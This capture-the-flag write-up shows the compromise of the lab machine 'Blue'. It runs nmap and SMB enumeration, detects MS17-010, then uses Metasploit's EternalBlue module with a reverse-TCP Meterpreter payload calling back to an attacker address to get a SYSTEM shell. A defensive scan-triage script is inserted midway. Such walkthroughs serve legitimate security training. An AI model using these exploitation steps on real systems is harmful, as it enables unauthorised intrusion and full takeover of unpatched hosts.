Blue Writeup

10 September 2022 #CTF #HTB #box #easy #windows


Enumeration

We will start with an nmap scan:

$ sudo nmap -F -sC -sV -oN enum/blue 10.10.10.40
[...]
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)

Host script results:
| smb2-security-mode: 
|   2.1: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
[...]
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: haris-PC
|   NetBIOS computer name: HARIS-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2022-08-08T11:22:26+01:00
[...]

SMB

Our nmap scan showed that guest (anonymous) access is allowed, so let's list the shares:

$ smbclient -N -L 10.10.10.40

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        Share           Disk
        Users           Disk

There are 2 non-default shares: Share and Users.

$ smbclient -N '//10.10.10.40/Share'
smb: \> ls
  .                                   D        0  Fri Jul 14 09:48:44 2017
  ..                                  D        0  Fri Jul 14 09:48:44 2017

Nothing in Share.

$ smbclient -N '//10.10.10.40/Users'
smb: \> ls
  .                                  DR        0  Fri Jul 21 02:56:23 2017
  ..                                 DR        0  Fri Jul 21 02:56:23 2017
  Default                           DHR        0  Tue Jul 14 03:07:31 2009
  desktop.ini                       AHS      174  Tue Jul 14 00:54:24 2009
  Public                             DR        0  Tue Apr 12 03:51:29 2011

After looking around a bit, no interesting files were found (like a user.txt in Default\Desktop or Public\Desktop).

Since we have nothing so far (and the box is running Windows 7), we can enumerate SMB further with some nmap scripts:

$ sudo nmap --script='smb-vuln-*' -p 139,445 10.10.10.40

This runs every nmap script whose name starts with 'smb-vuln-' against ports 139 and 445:

[...]
Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
[...]
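From the defender's side, scan output like the above is only useful once it is turned into tracked findings. As an added example (not part of the original writeup), the script below parses the nmap host-script blocks shown above (smb2-security-mode, smb-os-discovery, smb-vuln-ms17-010) from a constructed, abbreviated copy of that output and derives the findings a patch-management team would act on.

```python
"""Triage nmap SMB host-script output into actionable findings (added example)."""
import re

# Constructed sample: abbreviated copy of the host-script output from the scans above.
SAMPLE_NMAP = """\
Host script results:
| smb2-security-mode: 
|   2.1: 
|_    Message signing enabled but not required
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   Computer name: haris-PC
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
"""


def parse_host_scripts(text):
    """Split the '| script-name:' blocks into {name: [content lines]} without the '|' gutter."""
    scripts, current = {}, None
    for line in text.splitlines():
        m = re.match(r"^\|_?\s(\S+):\s*$", line)  # exactly one space: a new script block
        if m:
            current = m.group(1)
            scripts[current] = []
        elif current and line.startswith("|"):
            scripts[current].append(line.lstrip("|_").strip())
    return scripts


def triage(scripts):
    """Return (severity, description) findings derived from the parsed blocks."""
    findings = []
    if "not required" in " ".join(scripts.get("smb2-security-mode", [])):
        findings.append(("MEDIUM", "SMB signing not required: sessions can be tampered with in transit"))
    os_line = next((l for l in scripts.get("smb-os-discovery", []) if l.startswith("OS:")), "")
    if "Windows 7" in os_line:  # Windows 7 left extended support in January 2020
        findings.append(("HIGH", "End-of-life OS: " + os_line[3:].strip()))
    vuln = scripts.get("smb-vuln-ms17-010", [])
    if any(l.startswith("State: VULNERABLE") for l in vuln):
        cves = ", ".join(re.findall(r"CVE-\d{4}-\d+", " ".join(vuln)))
        findings.append(("CRITICAL", f"MS17-010 unpatched ({cves}): apply the update and disable SMBv1"))
    return findings


if __name__ == "__main__":
    for severity, text in triage(parse_host_scripts(SAMPLE_NMAP)):
        print(f"[{severity}] {text}")
```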

Exploitation

The box is vulnerable to MS17-010, also known as 'EternalBlue', one of the most well-known vulnerabilities.

I'm going to use Metasploit since it seems like the most reliable way to exploit EternalBlue:

$ msfconsole
[...]
msf6 > search ms17-010

Matching Modules
================

   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   3  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection
   4  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution

msf6 > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.10.40
RHOSTS => 10.10.10.40
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.10.14.4
LHOST => 10.10.14.4
msf6 exploit(windows/smb/ms17_010_eternalblue) > run

[...]
[+] 10.10.10.40:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[...]

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

And there it is, we are 'root'!

Key Takeaways